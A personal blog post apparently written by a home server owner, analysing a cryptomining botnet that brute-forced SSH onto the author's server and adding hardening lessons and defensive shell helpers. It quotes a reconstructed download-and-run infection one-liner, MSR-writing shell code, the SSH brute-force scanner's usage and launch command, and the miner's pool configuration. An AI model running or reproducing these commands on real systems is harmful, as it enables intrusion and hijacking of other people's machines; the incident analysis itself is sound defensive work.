My server was infected

My dad called me in the morning to say that he couldn’t log in to his internet banking, because our IP was marked as malicious by brightcloud.com, which the banking provider uses for access checks. At first I just rolled my eyes, because my home network is regularly marked as dangerous just because my port 25 is open, which is probably something uncommon, I don’t know.

I didn’t pay much attention until I got an email from my ISP saying that my network probably contained an infected device that was scanning the internet. At this point I started to smell something rotten. I have very good experience with my ISP’s tech support and I knew that they would not send me an email for no reason.

I logged in to the server and indeed, all CPUs were fully saturated, although no network activity was visible at that moment. Luckily I have collectd deployed, so I was able to check the past activity. Indeed, there was unusual activity visible on the chart.

There was no doubt. My uplink was fully saturated between Wednesday ~18:30 and Thursday 12:00.

By the way, it is impressive how fast my ISP detected the malicious behaviour in my network. Their email mentioned that the problems started at 18:35, which means that it took them less than 15 minutes to classify it correctly. I put it on my todo list to implement something similar, because it is a bit embarrassing that I had to learn about my server being infected from someone else.
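As a starting point for that todo item, here is a minimal sketch of a check that could run from cron and complain when the 15-minute load average reaches the number of CPUs. The function names and the threshold are illustrative assumptions, and a check like this would only catch a CPU hog such as this miner, not the network scanning that the ISP noticed.

```shell
#!/bin/sh
# load_saturated LOAD NCPU: succeed when LOAD is at least NCPU.
# Hypothetical helper, not part of collectd or any existing tool.
load_saturated() {
    awk -v load="$1" -v ncpu="$2" 'BEGIN { exit !(load >= ncpu) }'
}

# check_host: compare the 15-minute load average with the number of online
# CPUs (Linux only, reads /proc/loadavg) and print a warning if saturated.
check_host() {
    load15=$(cut -d ' ' -f 3 /proc/loadavg)
    ncpu=$(getconf _NPROCESSORS_ONLN)
    if load_saturated "$load15" "$ncpu"; then
        echo "WARNING: load average $load15 on $ncpu CPUs"
    fi
}
```

Calling check_host from a cron job that mails its output would be one way to get notified; the right threshold depends on what the machine normally does.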

So I fired up the process explorer and started looking for suspicious activity. It was not so hard actually, because all cores were fully saturated by a process called kswapd0. The genuine kswapd0 is a kernel thread that handles memory reclaim and swapping, and it can use a lot of CPU, but two things were suspicious to me. I don’t have swap set up on my server (experimental setup), and this kswapd0 was running under the peertube user. I recently experimented with peertube just for fun and I didn’t expect the instance to be up for a long time, hence I made the mistake of not taking the security of its account very seriously.

I am aware that I deserved the malware because of my ignorance, but it was already there, so let’s play with it a little.

Malware

First I listed the open files of the hostile kswapd0 and found out that its working directory was /tmp/.X25-unix/.rsync/a/. I didn’t want to lose track, so I didn’t delete the folder immediately. Next I checked for other processes of the compromised user and found a process called tsm, executed from /tmp/.X25-unix/.rsync/c/lib64/.
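The same kind of inspection can be done without any extra tools by reading /proc directly. The following is a minimal sketch, assuming a Linux /proc layout and GNU or busybox stat; the function name inspect_uid_procs is made up for illustration. It prints the PID, command name, executable path and working directory of every process owned by a given numeric UID.

```shell
#!/bin/sh
# inspect_uid_procs UID: list processes owned by UID with their executable
# and working directory. Run as root to see other users' /proc links.
# Ownership is taken from the /proc/PID directory, which is an approximation
# for processes that changed their credentials.
inspect_uid_procs() {
    for dir in /proc/[0-9]*; do
        [ "$(stat -c %u "$dir" 2>/dev/null)" = "$1" ] || continue
        pid=${dir#/proc/}
        printf '%s\t%s\texe=%s\tcwd=%s\n' "$pid" \
            "$(cat "$dir/comm" 2>/dev/null)" \
            "$(readlink "$dir/exe" 2>/dev/null)" \
            "$(readlink "$dir/cwd" 2>/dev/null)"
    done
}
```

For example, inspect_uid_procs "$(id -u peertube)" would list everything running under the compromised account. A process whose name looks like a kernel thread but whose exe points into /tmp is a strong hint that something is wrong.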

OK, so I shot down all suspicious processes, backed up the /tmp/.X25-unix/ directory (with chmod -R a-x as a primitive safety measure to keep myself from accidentally launching the malware by hand) and deleted the original one in /tmp. I had never hunted malware before, but I was aware that these are pretty sleazy beasts. So, how could such a program become persistent?
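A small variation on that backup step, as a sketch: chmod -R a-x also removes the search bit from directories, which makes the copy awkward to browse as a regular user. The hypothetical quarantine helper below copies the tree and strips the execute bit from regular files only. The destination path is whatever you choose and must not exist yet.

```shell
#!/bin/sh
# quarantine SRC DEST: copy SRC to a new directory DEST (without following
# symlinks, preserving modes and timestamps) and strip the execute bit from
# regular files only, so that directories stay traversable.
quarantine() {
    cp -RPp "$1" "$2" || return 1
    find "$2" -type f -exec chmod a-x {} +
}
```

This only guards against launching something by accident; a script in the copy can still be run by passing it to an interpreter explicitly.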

The crontab is commonly misused for this, so I checked it with crontab -u peertube -l. Bingo, the crontab contained five entries pointing to $PEERTUBE_HOME/.configrc/. This revealed another infected location, which I backed up and wiped.

mkdir -p /tmp/.X25-unix/;curl -L <malicious ip> > dota3.tar.gz;
tar xf dota3.tar.gz; .rsync/initall
I did not catch the initial infection command, but I assume it looked similar to this one.
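The crontab check described above can be extended to every account on the machine. This is a rough sketch: the helper names are hypothetical and the patterns (anything under /tmp or inside a hidden directory) are an assumption about where this kind of malware likes to live, not a complete list.

```shell
#!/bin/sh
# suspicious_cron_lines: read crontab text on stdin and print the active
# (non-comment) entries that reference /tmp or a hidden directory.
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' | grep -E '(/tmp/|/\.[^/. ][^/ ]*/)'
}

# scan_all_crontabs: run the filter over the crontab of every local user.
# Needs root, because crontab -u is restricted to the superuser.
scan_all_crontabs() {
    cut -d: -f1 /etc/passwd | while read -r user; do
        crontab -u "$user" -l 2>/dev/null | suspicious_cron_lines |
            sed "s|^|$user: |"
    done
}
```

A single account can be checked with crontab -u peertube -l | suspicious_cron_lines. Legitimate jobs may match too, so the output is a list of things to look at rather than a verdict.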

The archive dota3.tar.gz indeed seems to be the initial source of infection. It contains a directory .rsync with subdirectories a, b and c and a bunch of files with about 260 lines of shell code (as reported by tokei). The .rsync directory holds three files with init in their names, but only .rsync/initall calls the other two (init and init2), so it seems to be the main entry point.

The initall script first removes some files and directories from /tmp, executes the init script, then switches to the user’s home and executes init2. It also kills (with kill -9) some processes that are later started again; it seems that the script is killing instances of itself in case the same computer was infected multiple times.

The whole initialization mainly copies the directories a, b and c to ~/.configrc and invokes initialization of these three modules.

Module a

This module contains three shell scripts and an executable called kswapd0, the one that I found gobbling all my CPU time.

The installation script has the same name as the module. I find it interesting that the parent install script tries to execute a/init0, despite the fact that there is no such file in the initial archive, nor is it created in the previous steps. It is probably created later, and it may be a measure to deal with partial deletion of the malware.

The a/a install script first creates a file upd (which is later referenced in a crontab). The interesting thing here is that the malware tries to turn on the nr_hugepages system feature. I do not know whether this is performance tuning or an attempt to expose some speculative execution flaws in the CPU. The latter would probably not be necessary: when the malware is able to use sysctl, it already runs with high enough privileges to get whatever it wants more easily, so it does not need speculative execution flaws to steal data. My personal tip would be that it is performance tuning, but that is only a guess.

Then the script detects what hardware it is running on and tries to write to a few MSRs.

if cat /proc/cpuinfo | grep "AMD Ryzen" > /dev/null;
        then
                echo "Detected Ryzen"
                wrmsr -a 0xc0011022 0x510000
                wrmsr -a 0xc001102b 0x1808cc16
                wrmsr -a 0xc0011020 0
                wrmsr -a 0xc0011021 0x40
                echo "MSR register values for Ryzen applied"
elif cat /proc/cpuinfo | grep "Intel" > /dev/null;
        then
                echo "Detected Intel"
                wrmsr -a 0x1a4 6
                echo "MSR register values for Intel applied"
else
        echo "No supported CPU detected"
fi

Looking into the Intel SDM, Volume 4, we see that the write goes to the MSR named MSR_MISC_FEATURE_CONTROL. This MSR is apparently present only on selected CPUs (Intel Atom, Nehalem, Sandy Bridge). Writing 6 to it (0b110) sets bits one and two, which looks like disabling the L2 Adjacent Cache Line Prefetcher and the DCU Hardware Prefetcher. Why exactly this is done I have no idea.
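To double-check the bit arithmetic, here is a small sketch that names the bits set in a value written to MSR 0x1a4. The function name is hypothetical, and the bit names follow the prefetcher-control layout that the Intel SDM gives for the CPU families implementing this MSR; other families may define the register differently.

```shell
#!/bin/sh
# decode_msr_1a4 VALUE: print the name of every bit set in VALUE, assuming
# the four prefetcher-disable bits (0 to 3) described in the Intel SDM.
decode_msr_1a4() {
    value=$(( $1 ))
    bit=0
    for name in \
        "L2 hardware prefetcher disable" \
        "L2 adjacent cache line prefetcher disable" \
        "DCU hardware prefetcher disable" \
        "DCU IP prefetcher disable"
    do
        if [ $(( (value >> bit) & 1 )) -eq 1 ]; then
            echo "bit $bit: $name"
        fi
        bit=$(( bit + 1 ))
    done
}
```

Running decode_msr_1a4 6 prints bit 1 (L2 adjacent cache line prefetcher disable) and bit 2 (DCU hardware prefetcher disable), which agrees with the reading above.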

It is also interesting how the malware prints nice logs.

The init script then launches ./upd, which it created by echoing code to the file, and ./upd in turn executes ./run. The ./run script checks whether it is on a 64-bit or 32-bit architecture and executes ./kswapd0 or ./anacron, respectively.

The ./kswapd0 is a statically linked ELF executable, probably compiled with a high level of optimization judging by how the assembly looks.

Analysis of the strings in this binary shows that it is a renamed (modified?) XMRig cryptocurrency mining program.

 Usage: xmrig [OPTIONS]
 Network:
   -o, --url=URL                 URL of mining server
   -a, --algo=ALGO               mining algorithm https://xmrig.com/docs/algorithms
       --coin=COIN               specify coin instead of algorithm
   -u, --user=USERNAME           username for mining server
   -p, --pass=PASSWORD           password for mining server
   -O, --userpass=U:P            username:password pair for mining server
   -x, --proxy=HOST:PORT         connect through a SOCKS5 proxy
   -k, --keepalive               send keepalived packet for prevent timeout (needs pool support)
       --nicehash                enable nicehash.com support
       --rig-id=ID               rig identifier for pool-side statistics (needs pool support)
   -r, --retries=N               number of times to retry before switch to backup server (default: 5)
   -R, --retry-pause=N           time to pause between retries (default: 5)
       --user-agent              set custom user-agent string for pool
       --donate-level=N          donate level, default 1%% (1 minute in 100 minutes)
       --donate-over-proxy=N     control donate over xmrig-proxy feature
       --no-cpu                  disable CPU mining backend
   -t, --threads=N               number of CPU threads
   -v, --av=N                    algorithm variation, 0 auto select
       --cpu-affinity            set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
       --cpu-priority            set process priority (0 idle, 2 normal to 5 highest)
       --cpu-max-threads-hint=N  maximum CPU threads count (in percentage) hint for autoconfig
       --cpu-memory-pool=N       number of 2 MB pages for persistent memory pool, -1 (auto), 0 (disable)
       --cpu-no-yield            prefer maximum hashrate rather than system response/stability
       --no-huge-pages           disable huge pages support
       --asm=ASM                 ASM optimizations, possible values: auto, none, intel, ryzen, bulldozer
       --argon2-impl=IMPL        argon2 implementation: x86_64, SSE2, SSSE3, XOP, AVX2, AVX-512F
       --randomx-init=N          threads count to initialize RandomX dataset
       --randomx-no-numa         disable NUMA support for RandomX
       --randomx-mode=MODE       RandomX mode: auto, fast, light
       --randomx-1gb-pages       use 1GB hugepages for RandomX dataset (Linux only)
       --randomx-wrmsr=N         write custom value(s) to MSR registers or disable MSR mod (-1)
       --randomx-no-rdmsr        disable reverting initial MSR values on exit
       --randomx-cache-qos       enable Cache QoS
   -S, --syslog                  use system log for output messages
   -l, --log-file=FILE           log all output to a file
       --print-time=N            print hashrate report every N seconds
       --no-color                disable colored output
       --verbose                 verbose output
   -c, --config=FILE             load a JSON-format configuration file
   -B, --background              run the miner in the background
   -V, --version                 output version information and exit
   -h, --help                    display this help and exit
       --dry-run                 test configuration and exit
       --export-topology         export hwloc topology to a XML file and exit
       --pause-on-battery        pause mine on battery power
 XMRig 6.6.2
  built on Dec  6 2020 with GCC

The option --no-huge-pages answers the question of why the installation script was trying to enable kernel hugepages.

I thought that if something mines coins, it must have some payee address where the coins are stored. Such an address would almost certainly be specified in the miner’s configuration.

According to the XMRig documentation, the config can be given either on the command line (there was none, because I’ve seen the launcher script) or in a JSON file located in the same directory as the binary (there was none either). I therefore searched the strings of the binary for some keys from the example configuration, and I indeed found an embedded JSON config snippet.

.config/xmrig.json
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
		...
    },
    "autosave": true,
    "version": 1,
    "background": true,
    "colors": true,
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": false,
        "hw-aes": null,
        "priority": null,
        "memory-pool": false,
        "yield": true,
        "max-threads-hint": 100,
        "asm": true,
        "argon2-impl": null,
        "astrobwt-max-size": 550,
        "cn/0": false,
        "cn-lite/0": false,
        "kawpow": false
    },
    "opencl": {
        "enabled": false,
		...
    },
    "cuda": {
        "enabled": false,
		...
    },
    "donate-level": 0,
    "donate-over-proxy": 0,
    "log-file": null,
    "pools": [
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.117:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": true,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        }...
    ]
}
A snippet of json configuration extracted from the xmrig binary. I left out the configuration of disabled features, and also provided only one pool config.
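The search for embedded configuration keys can be sketched as follows. This is an illustration rather than the exact commands used for the analysis: the helper names are made up, and the tr fallback is only a crude stand-in for strings(1) on systems without binutils.

```shell
#!/bin/sh
# printable_strings FILE: print runs of at least 6 printable characters,
# using strings(1) when available and a crude tr(1) fallback otherwise.
printable_strings() {
    if command -v strings >/dev/null 2>&1; then
        strings -a -n 6 "$1"
    else
        tr -c '[:print:]' '\n' < "$1" | grep -E '.{6,}'
    fi
}

# pool_urls FILE: list the distinct values of "url" keys embedded in FILE.
pool_urls() {
    printable_strings "$1" |
        grep -E -o '"url"[[:space:]]*:[[:space:]]*"[^"]*"' |
        sed -E 's/.*"([^"]*)"$/\1/' | sort -u
}
```

Running pool_urls on the miner binary should list every pool endpoint baked into it, which makes it easy to see whether they all fall into one address range.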

From the XMRig documentation it seems that the coins are not sent to the wallet directly; instead all the miners are connected to some pool, which probably stores the beneficiary wallet addresses. The snippet has configuration for multiple pools, all within the IP range 45.9.148.0/24.

Checking some of the mining pool IPs from the config reveals that they were reported for the same reason as far back as 23 November 2020. Assuming that the reports and their timestamps are real, the first abuse report for this IP was filed about two weeks before the XMRig version I obtained was compiled (also assuming a correct clock on the attacker’s computer). If both assumptions hold, the same IP was used by at least two different versions of the malware.

The IP range is registered to a company called “Nice IT Customers Network” and it probably points to some server housing in the Netherlands.

Feeding it to shodan (what a wonderful service) reveals nothing interesting, while nmap shows us 5 open ports. Three of them are OpenSSH (why?), and ports 80 and 443 are running some service over SSL. From the configuration snippet we already know that the services on ports 80 and 443 (the latter is not shown in the snippet above) expose the interface of a mining pool director or maybe xmrig-proxy. Examining ports 80 and 443 with the s_client subcommand of openssl(1) reports that both services use the same self-signed certificate with CN=localhost, issued on Jul 24 14:20:07 2020 GMT and valid for 10 years.
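For reference, a certificate check of this kind can be sketched with two small wrappers around openssl(1). The function names are hypothetical; the host and port are whatever you are investigating, and connecting to an attacker-controlled machine reveals your own address to it.

```shell
#!/bin/sh
# fetch_cert HOST PORT: print, in PEM form, the certificate that the TLS
# service at HOST:PORT presents.
fetch_cert() {
    openssl s_client -connect "$1:$2" </dev/null 2>/dev/null |
        openssl x509 -outform PEM
}

# cert_summary: read a PEM certificate on stdin and print its subject,
# its issuer and its validity window.
cert_summary() {
    openssl x509 -noout -subject -issuer -dates
}
```

A call such as fetch_cert "$host" 443 | cert_summary prints the subject, issuer, notBefore and notAfter lines. An identical subject and issuer is the usual sign of a self-signed certificate.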

What makes no sense to me is that the key "tls" is set to false in all pool configurations in the JSON snippet above. At first sight it seems that this configuration should be unable to connect to the remote service, which is tunnelled over TLS. This is something I don’t really understand.

$ nmap -sV 45.9.148.117
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 09:32 CEST
Nmap scan report for 45.9.148.129
Host is up (0.033s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
21/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  ssl/http?
222/tcp open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
443/tcp open  ssl/https?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Connecting to the three open SSH ports shows the same host key fingerprint, which makes me think that these ports are not tunnelled to other machines but are really just three open ports of the same OpenSSH instance. I don’t see any benefit in this setup, but then I am probably missing some trick.

Module b

This module is the simplest one, as it contains only three files. The entry file is again called a, and it mainly calls the other two files, first ./stop and then ./run. The ./stop script kills another set of processes, probably so as not to share the machine with anyone.

The ./run file has only two lines, but almost 47 KiB.

Let’s start with the second line. It removes the existing ~/.ssh and replaces it with its own version with only one authorized key (ssh-rsa key with comment “mdrfckr”…). I initially missed this one, so it pointed me to another location that had to be wiped. This was literally a backdoor and it is very likely that the malware would reinstall itself using this entry vector.
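Since this backdoor is easy to overlook, a quick search for the key comment across all accounts is worthwhile. A minimal sketch, with a hypothetical helper name; the comment string "mdrfckr" is the one from this sample and other variants may use a different one.

```shell
#!/bin/sh
# find_key_comment PATTERN FILE...: print authorized_keys entries containing
# the literal PATTERN, prefixed with file name and line number. The extra
# /dev/null argument makes grep print the file name even for a single file.
find_key_comment() {
    pattern=$1
    shift
    grep -n -F -- "$pattern" "$@" /dev/null
}
```

Run as root, find_key_comment mdrfckr /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys covers the usual locations; accounts with a home directory elsewhere (such as service users) need to be added by hand.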

The first line is literally echo "..." | base64 --decode | perl. The decoded string still wasn’t human readable, because it contained only eval unpack u => q{_....... I have never written a single line of Perl, but luckily replacing the eval with print revealed the program to me.

The resulting code was actually pretty nice. The variables were not mangled and even the formatting was preserved.

After some time spent reading the code, two things became obvious.

  1. It is an IRC client. Probably a relative of this old script from 2012.
  2. It is full of Portuguese. Variable names, error messages, everything was in Portuguese.

An IRC client obviously needs an IRC server, so I grep(1)ed for URLs and IP addresses in the Perl code. And what a surprise, the default IRC server is 45.9.148.99, again in the same known IP range as the pool. At the time of writing this post the machine was offline. Consulting shodan about the IP discloses that the machine was last seen online on 10 April 2022, with two open ports (443 and 6667), both running unrealircd.

I assume that this is the remote control feature of the malware. It is also likely that the IRC server machine is only brought online when new instructions are available for the botnet. Listening to the communication of this server could provide information about future attacks even before they happen, but I don’t feel like turning my server into a honeypot.

Module c

This module is by far the most complex of the whole application. As is tradition, it contains a few scripts that execute each other in an obfuscated and seemingly random manner, and a bunch of binaries, both executables and libraries. The most interesting part here is the file ip, which is about 700 KiB of IP addresses (40k lines).

This file is not present in the original archive, so it was likely created on my computer. Indeed, the file is removed before and after execution of the binary tsm64, and the binary also gets the filename ‘ip’ as its last parameter. Similar files contain pairs of users and their passwords, probably found by the parallel scanner.

Analyzing the binaries tsm32 and tsm64 with strings(1) reveals a lot of error messages related to the workings of the SSH protocol. The module also contains the libraries libc, libnss_dns, libnss_files, libpthread and libresolv. All of them are present in two versions, one for 32 and one for 64 bits. My guess therefore is that this module is used for parallel scanning of IPv4 addresses. It is likely that this module was responsible for triggering the red light at my ISP’s desk. The network scanner is executed with a timeout of 6 hours, and between runs it sleeps for a random time.

 ---------------------->Faster than light<-----------------------------
 --------------------->use only for testing<---------------------------
 Use: scan [OPTIONS] [[USER PASS]] FILE] [IPs/IPs Port FILE]
 -t [NUMTHREADS]: Change the number of threads used. Default is %d
 -m [MODE]: Change the way the scan works. Default is %d
 -f [FINAL SCAN]: Does a final scan on found servers. Default is %d
 Use -f 1 for A.B class /16. Default is 2 for A.B.C /24
 -i [IP SCAN]: use -i 0 to scan ip class A.B. Default is %d
 if you use -i 0 then use ./scan -p 22 -i 0 p 192.168 as agrument for ip file
 -m 0 for non selective scanning
 -P 0 leave default password unchanged. Changes password by default.
 -s [TIMEOUT]: Change the timeout. Default is %ld
 -S [2ndTIMEOUT]: Change the 2nd timeout. Default is %ld
 -p [PORT]: Specify another port to connect to. 0 for multiport
 -c [REMOTE-COMMAND]: Command to execute on connect. Use ; or && with commands
 Use: ./scan -t 202 -s 5 -S 5 p ip -c "uname"
 Use: ./scan -t 202 -s 5 -S 5 -i 0 -p 22 p 192.168
 The example above will scan 192.168 port 22 and brute force the IP list.
 Use: ./scan -t 202 -s 5 -S 5 -p 0 p ip - for "ip port" file
 Use: ./scan -t 202 -s 5 -S 5 -p 23 -m 0 p ip - for other protocols
 When using -m 1 (default value) the scan will only target full linux
 machines or windows machines with openssh installed. Routers, busyboxes
 honeypots and other limited linux devices will be skipped from the output.
 Use -m 0 for non-selective scanning (can be used for all type of ssh devices)
 this includes busyboxes, routers, honeypots and other devices with limited
 commands. ================================================================
Around line 9300 in the strings output, I found the help string

The launcher script sets the $threads variable to 515, but if the machine is ARM, it is decreased to only 75. This is probably meant for infected Raspberry Pis and similar IoT toys. Despite this hint I found no binary compiled for ARM, and hence I do not understand its purpose.

 timeout 6h ./tsm -t $threads -f 1 -s 12 -S 10 -p 0 -d 1 p ip
The command used to execute the parallel scanner

The string “0.8.2 (c) 2003-2018 Aris Adamantiadis, Andreas Schneider and libssh contributors. Distributed under the LGPL, please refer to COPYING file for information about your rights” tells us why there are so many SSH-related strings in the binary: it is compiled with libssh.

The strings /home/test/ and /home/buH show that the person compiling the malware was cautious enough not to build it on their own workstation and didn’t leak their username.

Analysis of the strings in the c/lib/64/tsm binary suggests that it is a renamed ld.so.

Lessons learned

I was unable to track down the initial entry vector. First I suspected that the entry was via the peertube application, but from various sources on the internet and from analysis of the binaries I learned that the malware spreads over SSH by brute-forcing passwords. This matches a misconfiguration found on my server, where I accidentally didn’t disable password auth over SSH. I keep the configuration of my servers as an ansible playbook in a git repository, but this Christmas I did a major rewrite of the config and this part somehow disappeared from the new version. The configuration was updated accordingly, so this should no longer be an issue (though without removing the backdoor SSH key this would not protect against re-infection).
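A regression like this one can be caught with a small check run after every deployment. The following is a rough sketch with a hypothetical helper name. It only looks at a single sshd_config-style file and ignores Include files and Match blocks, so it is a smoke test rather than an authoritative answer.

```shell
#!/bin/sh
# password_auth_setting FILE: print the first PasswordAuthentication value
# found in FILE (sshd uses the first value it reads for a keyword), or
# "unset" when the keyword does not appear. Commented-out lines are skipped
# because their first field starts with "#".
password_auth_setting() {
    awk 'tolower($1) == "passwordauthentication" {
             print tolower($2); found = 1; exit
         }
         END { if (!found) print "unset" }' "$1"
}
```

Anything other than "no" from password_auth_setting /etc/ssh/sshd_config deserves a look, because OpenSSH allows password logins when the keyword is not set. For the effective configuration including all included files, sshd -T (run as root) prints every resolved setting.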

I also modified the fstab, and now /tmp and the whole RAID are mounted as noexec. This is not bulletproof either, but studying the source code of this malware suggests that if it is not able to execute binaries in /tmp, it would not be able to proceed. Such a security measure can be bypassed by cat script | sh, and the malware indeed uses this invocation sometimes, but not exclusively: it relies on direct invocation in about half of the cases.
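Whether the noexec option is really in effect can be verified against the kernel's view of the mounts instead of trusting the fstab. A minimal sketch, assuming Linux and a hypothetical helper name:

```shell
#!/bin/sh
# is_noexec MOUNTPOINT [MOUNTS_FILE]: succeed when MOUNTPOINT is mounted
# with the noexec option. MOUNTS_FILE defaults to /proc/mounts; the second
# field of each line is the mount point, the fourth the option list.
is_noexec() {
    awk -v mp="$1" '
        $2 == mp { opts = $4 }    # the last matching mount wins
        END { exit !(("," opts ",") ~ /,noexec,/) }
    ' "${2:-/proc/mounts}"
}
```

For example, is_noexec /tmp || echo "/tmp allows execution" could go into the same post-deployment checks as the SSH test. The function also fails for paths that are not mount points at all, which is the safer default for a check like this.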

As far as I can tell with my limited knowledge of malware tricks, this was one of those less harmful/less smart beasts and I was lucky to not get anything worse.

Resources